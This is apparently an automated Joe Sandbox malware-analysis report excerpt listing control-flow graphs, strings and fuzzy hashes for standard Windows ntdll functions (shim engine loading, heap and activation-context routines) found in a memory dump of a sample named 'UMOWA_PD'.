                                                                                    control_flow_graph 457 33cc7550-33cc7571 458 33cc75ab-33cc75b9 call 33cd4b50 457->458 459 33cc7573-33cc758f call 33c9e580 457->459 464 33d04443 459->464 465 33cc7595-33cc75a2 459->465 469 33d0444a-33d04450 464->469 466 33cc75ba-33cc75c9 call 33cc7738 465->466 467 33cc75a4 465->467 475 33cc75cb-33cc75e1 call 33cc76ed 466->475 476 33cc7621-33cc762a 466->476 467->458 470 33d04456-33d044c3 call 33d1ef10 call 33cd8f40 RtlDebugPrintTimes BaseQueryModuleData 469->470 471 33cc75e7-33cc75f0 call 33cc7648 469->471 470->471 489 33d044c9-33d044d1 470->489 471->476 481 33cc75f2 471->481 475->469 475->471 479 33cc75f8-33cc7601 476->479 483 33cc762c-33cc762e 479->483 484 33cc7603-33cc7612 call 33cc763b 479->484 481->479 488 33cc7614-33cc7616 483->488 484->488 491 33cc7618-33cc761a 488->491 492 33cc7630-33cc7639 488->492 489->471 493 33d044d7-33d044de 489->493 491->467 494 33cc761c 491->494 492->491 493->471 495 33d044e4-33d044ef 493->495 496 33d045c9-33d045db call 33cd2b70 494->496 498 33d045c4 call 33cd4c68 495->498 499 33d044f5-33d0452e call 33d1ef10 call 33cda9c0 495->499 496->467 498->496 506 33d04530-33d04541 call 33d1ef10 499->506 507 33d04546-33d04576 call 33d1ef10 499->507 506->476 507->471 512 33d0457c-33d0458a call 33cda690 507->512 515 33d04591-33d045ae call 33d1ef10 call 33d0cc1e 512->515 516 33d0458c-33d0458e 512->516 515->471 521 33d045b4-33d045bd 515->521 516->515 521->512 522 33d045bf 521->522 522->471
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 33D04507
                                                                                    • Execute=1, xrefs: 33D0451E
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 33D04592
                                                                                    • ExecuteOptions, xrefs: 33D044AB
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 33D04530
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 33D04460
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 33D0454D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: 0ba08c0c24f928d100640926cc5ee39b535b9cfcad3440ff2119c8f50899d5cd
                                                                                    • Instruction ID: 532de31bf2553add2c8dc79083e9a40240683c18b434de3623cd0e6e6e5a9c75
                                                                                    • Opcode Fuzzy Hash: 0ba08c0c24f928d100640926cc5ee39b535b9cfcad3440ff2119c8f50899d5cd
                                                                                    • Instruction Fuzzy Hash: 3F51F7B1E00359AEEB10ABA5DC85FE973B8EF04750F4404E9FA05EB581DB709A468F60
                                                                                    Function 33CAA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1026 33caa170-33caa18f 1027 33caa4ad-33caa4b4 1026->1027 1028 33caa195-33caa1b1 1026->1028 1027->1028 1029 33caa4ba-33cf77c8 1027->1029 1030 33cf77f3-33cf77f8 1028->1030 1031 33caa1b7-33caa1c0 1028->1031 1029->1028 1034 33cf77ce-33cf77d3 1029->1034 1031->1030 1033 33caa1c6-33caa1cc 1031->1033 1035 33caa5da-33caa5dc 1033->1035 1036 33caa1d2-33caa1d4 1033->1036 1037 33caa393-33caa399 1034->1037 1038 33caa1da-33caa1dd 1035->1038 1039 33caa5e2 1035->1039 1036->1030 1036->1038 1038->1030 1040 33caa1e3-33caa1e6 1038->1040 1039->1040 1041 33caa1fa-33caa1fd 1040->1041 1042 33caa1e8-33caa1f1 1040->1042 1045 33caa203-33caa24b 1041->1045 1046 33caa5e7-33caa5f0 1041->1046 1043 33cf77d8-33cf77e2 1042->1043 1044 33caa1f7 1042->1044 1048 33cf77e7-33cf77f0 call 33d1ef10 1043->1048 1044->1041 1049 33caa250-33caa255 1045->1049 1046->1045 1047 33caa5f6-33cf780c 1046->1047 1047->1048 1048->1030 1052 33caa25b-33caa263 1049->1052 1053 33caa39c-33caa39f 1049->1053 1055 33caa26f-33caa27d 1052->1055 1056 33caa265-33caa269 1052->1056 1053->1055 1057 33caa3a5-33caa3a8 1053->1057 1058 33caa3ae-33caa3be 1055->1058 1061 33caa283-33caa288 1055->1061 1056->1055 1060 33caa4bf-33caa4c8 1056->1060 1057->1058 1059 33cf7823-33cf7826 1057->1059 1058->1059 1062 33caa3c4-33caa3cd 1058->1062 1065 33caa28c-33caa28e 1059->1065 1066 33cf782c-33cf7831 1059->1066 1063 33caa4ca-33caa4cc 1060->1063 1064 33caa4e0-33caa4e3 1060->1064 1061->1065 1062->1065 1063->1055 1067 33caa4d2-33caa4db 1063->1067 1068 33cf780e 1064->1068 1069 33caa4e9-33caa4ec 1064->1069 1070 33cf7833 1065->1070 1071 33caa294-33caa2ac call 33caa600 1065->1071 1072 33cf7838 1066->1072 1067->1065 1074 33cf7819 1068->1074 1069->1074 1075 33caa4f2-33caa4f5 1069->1075 1070->1072 1079 33caa3d2-33caa3d9 1071->1079 1080 33caa2b2-33caa2da 1071->1080 1073 33cf783a-33cf783c 1072->1073 1073->1037 1077 33cf7842 1073->1077 1074->1059 1075->1063 1081 33caa3df-33caa3e2 1079->1081 1082 33caa2dc-33caa2de 1079->1082 1080->1082 1081->1082 1083 33caa3e8-33caa3f3 1081->1083 1082->1073 1084 33caa2e4-33caa2eb 1082->1084 1083->1049 1085 33cf78ed 1084->1085 1086 33caa2f1-33caa2f4 1084->1086 1088 33cf78f1-33cf7909 call 33d1ef10 1085->1088 1087 33caa300-33caa30a 1086->1087 1087->1088 1089 33caa310-33caa32c call 33caa760 1087->1089 1088->1037 1094 33caa332-33caa337 1089->1094 1095 33caa4f7-33caa500 1089->1095 1094->1037 1096 33caa339-33caa35d 1094->1096 1097 33caa502-33caa50b 1095->1097 1098 33caa521-33caa523 1095->1098 1101 33caa360-33caa363 1096->1101 1097->1098 1102 33caa50d-33caa511 1097->1102 1099 33caa549-33caa551 1098->1099 1100 33caa525-33caa543 call 33c94428 1098->1100 1100->1037 1100->1099 1104 33caa3f8-33caa3fc 1101->1104 1105 33caa369-33caa36c 1101->1105 1106 33caa5a1-33caa5cb RtlDebugPrintTimes 1102->1106 1107 33caa517-33caa51b 1102->1107 1109 33cf7847-33cf784f 1104->1109 1110 33caa402-33caa405 1104->1110 1111 33caa372-33caa374 1105->1111 1112 33cf78e3 1105->1112 1106->1098 1125 33caa5d1-33caa5d5 1106->1125 1107->1098 1107->1106 1113 33cf7855-33cf7859 1109->1113 1114 33caa554-33caa56a 1109->1114 1110->1114 1115 33caa40b-33caa40e 1110->1115 1116 33caa37a-33caa381 1111->1116 1117 33caa440-33caa459 call 33caa600 1111->1117 1112->1085 1113->1114 1119 33cf785f-33cf7868 1113->1119 1120 33caa570-33caa579 1114->1120 1121 33caa414-33caa42c 1114->1121 1115->1105 1115->1121 1122 33caa49b-33caa4a2 1116->1122 1123 33caa387-33caa38c 1116->1123 1135 33caa57e-33caa585 1117->1135 1136 33caa45f-33caa487 1117->1136 1127 33cf786a-33cf786d 1119->1127 1128 33cf7892-33cf7894 1119->1128 1120->1111 1121->1105 1129 33caa432-33caa43b 1121->1129 1122->1087 1126 33caa4a8 1122->1126 1123->1037 1130 33caa38e 1123->1130 1125->1098 1126->1085 1132 33cf786f-33cf7879 1127->1132 1133 33cf787b-33cf787e 1127->1133 1128->1114 1134 33cf789a-33cf78a3 1128->1134 1129->1111 1130->1037 1139 33cf788e 1132->1139 1140 33cf788b 1133->1140 1141 33cf7880-33cf7889 1133->1141 1134->1111 1137 33caa58b-33caa58e 1135->1137 1138 33caa489-33caa48b 1135->1138 1136->1138 1137->1138 1142 33caa594-33caa59c 1137->1142 1138->1123 1143 33caa491-33caa493 1138->1143 1139->1128 1140->1139 1141->1134 1142->1101 1144 33caa499 1143->1144 1145 33cf78a8-33cf78b1 1143->1145 1144->1122 1145->1144 1146 33cf78b7-33cf78bd 1145->1146 1146->1144 1147 33cf78c3-33cf78cb 1146->1147 1147->1144 1148 33cf78d1-33cf78dc 1147->1148 1148->1147 1149 33cf78de 1148->1149 1149->1144
                                                                                    Strings
                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33CF77E2
                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33CF7807
                                                                                    • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 33CF78F3
                                                                                    • SsHd, xrefs: 33CAA304
                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 33CF77DD, 33CF7802
                                                                                    • Actx , xrefs: 33CF7819, 33CF7880
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                    • API String ID: 0-1988757188
                                                                                    • Opcode ID: 62e5eb6d32e5394524869acc5502d47d278cd909b4a13dd34e87248e7e195567
                                                                                    • Instruction ID: f4e762e1c8742e21acd09eb8b9be38f4d6bd933b855651b6cbdb6db4c0cbf32b
                                                                                    • Opcode Fuzzy Hash: 62e5eb6d32e5394524869acc5502d47d278cd909b4a13dd34e87248e7e195567
                                                                                    • Instruction Fuzzy Hash: 34E1E1796043828FE715CF69C89475A77E5BF84394F184A2DF8A5CF290D732D885CB81
                                                                                    Function 33CAD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1150 33cad690-33cad6cb 1151 33cad6d1-33cad6db 1150->1151 1152 33cad907-33cad90e 1150->1152 1153 33cf9164 1151->1153 1154 33cad6e1-33cad6ea 1151->1154 1152->1151 1155 33cad914-33cf9139 1152->1155 1161 33cf916e-33cf917d 1153->1161 1154->1153 1156 33cad6f0-33cad6f3 1154->1156 1155->1151 1160 33cf913f-33cf9144 1155->1160 1158 33cad8fa-33cad8fc 1156->1158 1159 33cad6f9-33cad6fb 1156->1159 1162 33cad701-33cad704 1158->1162 1164 33cad902 1158->1164 1159->1153 1159->1162 1163 33cad847-33cad858 call 33cd4b50 1160->1163 1165 33cf9158-33cf9161 call 33d1ef10 1161->1165 1162->1153 1166 33cad70a-33cad70d 1162->1166 1164->1166 1165->1153 1169 33cad919-33cad922 1166->1169 1170 33cad713-33cad716 1166->1170 1169->1170 1175 33cad928-33cf9153 1169->1175 1173 33cad71c-33cad768 call 33cad580 1170->1173 1174 33cad92d-33cad936 1170->1174 1173->1163 1180 33cad76e-33cad772 1173->1180 1174->1173 1176 33cad93c 1174->1176 1175->1165 1176->1161 1180->1163 1181 33cad778-33cad77f 1180->1181 1182 33cad8f1-33cad8f5 1181->1182 1183 33cad785-33cad789 1181->1183 1184 33cf9370-33cf9388 call 33d1ef10 1182->1184 1185 33cad790-33cad79a 1183->1185 1184->1163 1185->1184 1187 33cad7a0-33cad7a7 1185->1187 1189 33cad7a9-33cad7ad 1187->1189 1190 33cad80d-33cad82d 1187->1190 1192 33cf917f 1189->1192 1193 33cad7b3-33cad7b8 1189->1193 1191 33cad830-33cad833 1190->1191 1196 33cad85b-33cad860 1191->1196 1197 33cad835-33cad838 1191->1197 1195 33cf9186-33cf9188 1192->1195 1194 33cad7be-33cad7c5 1193->1194 1193->1195 1198 33cad7cb-33cad803 call 33cd8170 1194->1198 1199 33cf91f7-33cf91fa 1194->1199 1195->1194 1204 33cf918e-33cf91b7 1195->1204 1202 33cad866-33cad869 1196->1202 1203 33cf92e0-33cf92e8 1196->1203 1200 33cad83e-33cad840 1197->1200 1201 33cf9366-33cf936b 1197->1201 1224 33cad805-33cad807 1198->1224 1207 33cf91fe-33cf920d call 33ce8050 1199->1207 1208 33cad842 1200->1208 1209 33cad891-33cad8ac call 33caa600 1200->1209 1201->1163 1210 33cad86f-33cad872 1202->1210 1211 33cad941-33cad94f 1202->1211 1203->1211 1212 33cf92ee-33cf92f2 1203->1212 1204->1190 1205 33cf91bd-33cf91d7 call 33ce8050 1204->1205 1205->1224 1229 33cf91dd-33cf91f0 1205->1229 1234 33cf920f-33cf921d 1207->1234 1235 33cf9224 1207->1235 1208->1163 1231 33cad8b2-33cad8da 1209->1231 1232 33cf9335-33cf933a 1209->1232 1210->1197 1213 33cad874-33cad884 1210->1213 1211->1213 1216 33cad955-33cad95e 1211->1216 1212->1211 1214 33cf92f8-33cf9301 1212->1214 1213->1197 1220 33cad886-33cad88f 1213->1220 1221 33cf931f-33cf9321 1214->1221 1222 33cf9303-33cf9306 1214->1222 1216->1200 1220->1200 1221->1211 1233 33cf9327-33cf9330 1221->1233 1227 33cf9308-33cf930e 1222->1227 1228 33cf9310-33cf9313 1222->1228 1224->1190 1230 33cf922d-33cf9231 1224->1230 1227->1221 1236 33cf931c 1228->1236 1237 33cf9315-33cf931a 1228->1237 1229->1205 1238 33cf91f2 1229->1238 1230->1190 1242 33cf9237-33cf923d 1230->1242 1239 33cad8dc-33cad8de 1231->1239 1232->1239 1240 33cf9340-33cf9343 1232->1240 1233->1200 1234->1207 1241 33cf921f 1234->1241 1235->1230 1236->1221 1237->1233 1238->1190 1243 33cf9356-33cf935b 1239->1243 1244 33cad8e4-33cad8eb 1239->1244 1240->1239 1245 33cf9349-33cf9351 1240->1245 1241->1190 1246 33cf923f-33cf925c 1242->1246 1247 33cf9264-33cf926d 1242->1247 1243->1163 1251 33cf9361 1243->1251 1244->1182 1244->1185 1245->1191 1246->1247 1248 33cf925e-33cf9261 1246->1248 1249 33cf926f-33cf9274 1247->1249 1250 33cf92b4-33cf92b6 1247->1250 1248->1247 1249->1250 1252 33cf9276-33cf927a 1249->1252 1253 33cf92d9-33cf92db 1250->1253 1254 33cf92b8-33cf92d3 call 33c94428 1250->1254 1251->1201 1255 33cf927c-33cf9280 1252->1255 1256 33cf9282-33cf92ae RtlDebugPrintTimes 1252->1256 1253->1163 1254->1163 1254->1253 1255->1250 1255->1256 1256->1250 1260 33cf92b0 1256->1260 1260->1250
                                                                                    APIs
                                                                                    Strings
                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33CF9153
                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33CF9178
                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 33CF914E, 33CF9173
                                                                                    • Actx , xrefs: 33CF9315
                                                                                    • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33CF9372
                                                                                    • GsHd, xrefs: 33CAD794
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                    • API String ID: 3446177414-2196497285
                                                                                    • Opcode ID: 97b0e39b2e00ba371f1c8375702751cfeecad7d1277df3b63f85563750ff24fb
                                                                                    • Instruction ID: 89ee595b78402957130f4e1c22d3576ee92a134e17cd1fea7a3dd74d824abfa2
                                                                                    • Opcode Fuzzy Hash: 97b0e39b2e00ba371f1c8375702751cfeecad7d1277df3b63f85563750ff24fb
                                                                                    • Instruction Fuzzy Hash: 33E1B5B5A043428FEB40CF19C8A4B4AF7F4BF88354F484A6DE995CB291D771E944CB92
                                                                                    Function 33C8640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlDebugPrintTimes.NTDLL ref: 33C8651C
                                                                                      • Part of subcall function 33C86565: RtlDebugPrintTimes.NTDLL ref: 33C86614
                                                                                      • Part of subcall function 33C86565: RtlDebugPrintTimes.NTDLL ref: 33C8665F
                                                                                    Strings
                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 33CE9790
                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 33CE97B9
                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 33CE977C
                                                                                    • LdrpInitShimEngine, xrefs: 33CE9783, 33CE9796, 33CE97BF
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 33CE97A0, 33CE97C9
                                                                                    • apphelp.dll, xrefs: 33C86446
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-204845295
                                                                                    • Opcode ID: 5ee1dfa7554dbd7207ed7cae490e642110aef9fa1909b3236c7c87509f3fb4ea
                                                                                    • Instruction ID: 8062eaba25c4ed30d783990432a590963134e02ac329c802dc90a071a6f847fc
                                                                                    • Opcode Fuzzy Hash: 5ee1dfa7554dbd7207ed7cae490e642110aef9fa1909b3236c7c87509f3fb4ea
                                                                                    • Instruction Fuzzy Hash: A8510472609704AFE310EF24C890F9BB7E8EF84744F400919FAD5DB561DA34EA45CB92
                                                                                    Function 33D0FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                    • API String ID: 3446177414-4227709934
                                                                                    • Opcode ID: a7d646c8fd29fca632665b27f5e67594f562544c0e58812d0843b05adff2df4c
                                                                                    • Instruction ID: e90d4f5dbd9c5910cd6a7dd8dc835b77413f8de63d5d2755c7dca2bf6e4ea306
                                                                                    • Opcode Fuzzy Hash: a7d646c8fd29fca632665b27f5e67594f562544c0e58812d0843b05adff2df4c
                                                                                    • Instruction Fuzzy Hash: 82415EB9A01209AFDB01DF98C980ADEBBB9FF48B54F244159E945BB340D771A901CFA0
                                                                                    Function 33D3F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                    • API String ID: 3446177414-3492000579
                                                                                    • Opcode ID: 519cc470f9d511153053a4a8a6eac4f0b71ce0f1cf026ae130d584cab7c6ea52
                                                                                    • Instruction ID: 94579bcb4634730cdd7a541cdd4e8507cd68cfb462c1bbc7bc3b2a676ebbcdb9
                                                                                    • Opcode Fuzzy Hash: 519cc470f9d511153053a4a8a6eac4f0b71ce0f1cf026ae130d584cab7c6ea52
                                                                                    • Instruction Fuzzy Hash: 71712F759027489FCB02DFA8C4906ADFBF5FF4A724F088159E485AF652CB34AE41CB50
                                                                                    Function 33C86565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • LdrpLoadShimEngine, xrefs: 33CE984A, 33CE988B
                                                                                    • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33CE9843
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 33CE9854, 33CE9895
                                                                                    • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33CE9885
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-3589223738
                                                                                    • Opcode ID: d49cd6bbe6b76340a10226f982ebebd35a35bf953cb701fa5c5e15b4636c7b16
                                                                                    • Instruction ID: 92fb46c65adf679311dfc62acf7a0ecdecffb42487b5b57922d24420b5216565
                                                                                    • Opcode Fuzzy Hash: d49cd6bbe6b76340a10226f982ebebd35a35bf953cb701fa5c5e15b4636c7b16
                                                                                    • Instruction Fuzzy Hash: 36513676A10348AFDB14EBB8CC54A9D77F6AF40318F090165E695FF6A5CB70AD42CB80
                                                                                    Function 33CBDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                    • API String ID: 3446177414-3224558752
                                                                                    • Opcode ID: 51015ba4d4af2c087cd4468b2cd8cc4d58331a27a1201642fb751167e04b791a
                                                                                    • Instruction ID: 73acd8e3d6f47684d50b754cbe4b3923fa6369af85b50f0db13192bc375953b2
                                                                                    • Opcode Fuzzy Hash: 51015ba4d4af2c087cd4468b2cd8cc4d58331a27a1201642fb751167e04b791a
                                                                                    • Instruction Fuzzy Hash: EA413735A08B40DFEB01DF68C894B59BBB8FF40324F0846A8E455DF791CB79A981CB91
                                                                                    Function 33D3ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • HEAP: , xrefs: 33D3ECDD
                                                                                    • ---------------------------------------, xrefs: 33D3EDF9
                                                                                    • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 33D3EDE3
                                                                                    • Entry Heap Size , xrefs: 33D3EDED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                    • API String ID: 3446177414-1102453626
                                                                                    • Opcode ID: c563ced11fb7a0e9658578676b619229bed5a75312ea56a00e38d88331244dc6
                                                                                    • Instruction ID: 797d4cebb95986c7bd32ff7ca1645d374469c03c2cafbb1e42de38debc291536
                                                                                    • Opcode Fuzzy Hash: c563ced11fb7a0e9658578676b619229bed5a75312ea56a00e38d88331244dc6
                                                                                    • Instruction Fuzzy Hash: 28418D3AA12215DFC704DF18C88496ABBF5FF4A76471A84A9D408AF3A0D731FD42CB90
                                                                                    Function 33CBDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                    • API String ID: 3446177414-1222099010
                                                                                    • Opcode ID: 990bd55c36a2147e34c348c32e596bfdfe6ad9a4bed84229ca894f7097b9f550
                                                                                    • Instruction ID: 7acd90c1f30608e10e67251b3d3cbb50fb4145a2b32d6238608b6d824c50a7a5
                                                                                    • Opcode Fuzzy Hash: 990bd55c36a2147e34c348c32e596bfdfe6ad9a4bed84229ca894f7097b9f550
                                                                                    • Instruction Fuzzy Hash: 7D316736515B84DFEB52EF24C458B5937F8EF00718F080584E456CFA62CB7AE940CB61
